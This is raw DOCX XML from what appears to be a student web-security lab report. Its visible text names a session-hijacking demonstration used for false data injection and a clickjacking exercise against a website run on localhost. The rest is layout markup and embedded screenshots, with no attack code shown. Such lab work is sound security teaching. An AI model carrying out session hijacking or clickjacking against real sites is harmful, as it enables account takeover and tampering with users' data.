    <w:p w14:paraId="06AE4A91" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Conclusion :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hence Successfully demonstrated how to perform Session Hijacking to do false data Injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F5099" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3473F911" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251711488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4CB403E9" wp14:editId="3106E24E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41360" name="Group 4136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80" name="Shape 498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81" name="Shape 498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82" name="Shape 498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83" name="Shape 498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84" name="Shape 498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60" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49885" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49886" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49887" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49888" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4988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2512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="702489F3" wp14:editId="44CD1149">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41361" name="Group 4136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890" name="Shape 498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91" name="Shape 498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92" name="Shape 498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893" name="Shape 498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894" name="Shape 498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61" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49895" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49896" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49897" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49898" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4989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6026C1D6" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E72594" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43997BC0" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D5E8C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51910CFB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ABD738" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
        <w:ind w:right="9177"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6C579D" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69D476" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59089612" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39721D43" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D95C51" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B78C7B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
        <w:ind w:right="9177"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66952A97" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038FCFE1" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26A93B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493702A4" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6D2EFC" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB0587C" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="239" w:lineRule="auto"/>
        <w:ind w:right="9177"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113F45D9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="14"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43673D2B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="3583" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A1CE77A" wp14:editId="11E8F184">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>304800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41492" name="Group 4149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00" name="Shape 499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01" name="Shape 499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02" name="Shape 499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03" name="Shape 499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04" name="Shape 499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92" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49905" style="position:absolute;width:91;height:99364;left:0;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49906" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49907" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49908" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4990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3085FF4A" wp14:editId="1F9F856A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7185660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>379475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="74676" cy="9936480"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="41493" name="Group 4149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10" name="Shape 499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11" name="Shape 499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12" name="Shape 499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13" name="Shape 499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14" name="Shape 499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93" style="width:5.88pt;height:782.4pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:565.8pt;mso-position-vertical-relative:page;margin-top:29.8799pt;" coordsize="746,99364">
                <v:shape id="Shape 49915" style="position:absolute;width:91;height:99364;left:655;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49916" style="position:absolute;width:91;height:99364;left:563;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 49917" style="position:absolute;width:381;height:99364;left:182;top:0;" coordsize="38100,9936480" path="m0,0l38100,0l38100,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#000000"/>
                </v:shape>
                <v:shape id="Shape 49918" style="position:absolute;width:91;height:99364;left:91;top:0;" coordsize="9144,9936480" path="m0,0l9144,0l9144,9936480l0,9936480l0,0">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="round" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#ffffff"/>
                </v:shape>
                <v:shape id="Shape 4991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Clickjacking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA28252" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="24"/>
        <w:ind w:right="-185"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45CDEA95" wp14:editId="07AD1D04">
                <wp:extent cx="5986882" cy="3762985"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="41490" name="Group 41490"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5986882" cy="3762985"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5986882" cy="3762985"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="3549" name="Rectangle 3549"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="74F8C27D"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550" name="Rectangle 3550"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="202692"/>
                            <a:ext cx="766784" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="67E09AD0"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1 :</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="3551" name="Rectangle 3551"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="577545" y="202692"/>
                            <a:ext cx="3024773" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4FCDD7EF" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Starting the Website on local host</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="3552" name="Rectangle 3552"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2855036" y="202692"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4093A378"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553" name="Rectangle 3553"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5944820" y="3613785"/>
                            <a:ext cx="55943" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="5AA95F0E"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3563" name="Picture 3563"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId89"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="38303" y="390098"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="3564" name="Shape 3564"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="25603" y="377398"/>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CDEA95" id="Group 41490" o:spid="_x0000_s1283" style="width:471.4pt;height:296.3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59868,37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H6nceQQAAGkRAAAOAAAAZHJzL2Uyb0RvYy54bWzkWO1u2zYU/T9g&#10;7yDof2NZsmRJiFMMzRoUGNag7R6ApilLGEUSJP21p9+9pCi7sbMaGdAMa4DIFHl5ee65/DjU7dt9&#10;z6Mt06aTYhFPb5I4YoLKVSfWi/iPL+/flHFkLBErwqVgi/jATPz27uefbneqZqlsJV8xHYETYeqd&#10;WsSttaqeTAxtWU/MjVRMQGMjdU8svOr1ZKXJDrz3fJImSTHZSb1SWlJmDNTe+8b4zvlvGkbtx6Yx&#10;zEZ8EQM2657aPZf4nNzdknqtiWo7OsAgL0DRk07AoKOre2JJtNHdmau+o1oa2dgbKvuJbJqOMhcD&#10;RDNNnkTzoOVGuVjW9W6tRpqA2ic8vdgt/X37oNVn9aiBiZ1aAxfuDWPZN7rHX0AZ7R1lh5EytrcR&#10;hcq8KouyTOOIQls2L9KqzD2ptAXmz/rR9tdv9JyEgSdfwdkpmCDmyIH5dxx8bolijlpTAwePOupW&#10;EEA+q+JIkB5m6ieYO0SsOYtcraPH2Y5kmdoAb1czlVezzPM0rcpZViBNY7CkVtrYByb7CAuLWMPw&#10;bkaR7W/GetNggkNygU8h33ec+1asAc4CKizZ/XLvApumKQ6HdUu5OkC4rdR/fYSF23C5W8RyKMW4&#10;lmF0bI0j/kEAzbhsQkGHwjIUtOXvpFtcHs8vGyubzgE+jjYAg/x5DN8hkTnAPk8k1A40QNKvTWSa&#10;pEXl+CN1mPfzopiXs9dLZxbi+FHSOb2Yzmmg4ap05vN5PsvjCLaqSznNknQ2n7/iGp2FaH6UpMK5&#10;cWGNjlvVVUlNyzxPYDd9Lqt5nmcgQvB8eo19152Gx53w/7/vwvq5kNNxv7oqp3BUzsoUdnAUFcU0&#10;mwdREbbf/HUPU3d2/xeSqjpaw/+gDKF0poq+raChl91oFg9O+qt89ET/uVFvQMQqYrtlxzt7cIIc&#10;NAuCEtvHjqI4whfI+SiwinF+gAGOC/IK6uBUDpbYDxUNvn/lZsk7hXIHhQaWB8Cg5p+o4Qsxe6V9&#10;L+mmZ8L6q4NmHLBLYdpOmTjSNeuXDFSg/rBy5wqpjdXM0hYHbGBglISI7KTBoTwCQ8zPiMKszBKI&#10;HWd0lSRViSEf9URezrM5ahano8GyStzO8VKB6HB5JK4IwL6b9CpAF/ktwKlsTPB4sl21/NO8CFTB&#10;eXxOVVVNj1SlVXZGFd14LY0MB/0Md7OVV9JQ14YS3YtQRMX9j9dEmOnYD51iMQLdnJcDlhbSmnko&#10;2N6DoP4inaU93oGChZ9DRxsuTm1HnzhVBp++R7ALv8r5PrV38hbmTLAIv97Sb6hPbSiXhvkBMCw3&#10;v8dQwdcpmVxg1Gk+S3CqEriwN7CG3D0F7qpiFXAOgt9PQNwojT1whnxw8Yk1cCeBu+PU9TN6vXzH&#10;dbQleItwf7g0XBBgin382ht6Jc/2QlPCVUsGX4ObYQDncvCElsx9HRjBDG7pgMZ/IoCLNsQZPhQA&#10;pLGTg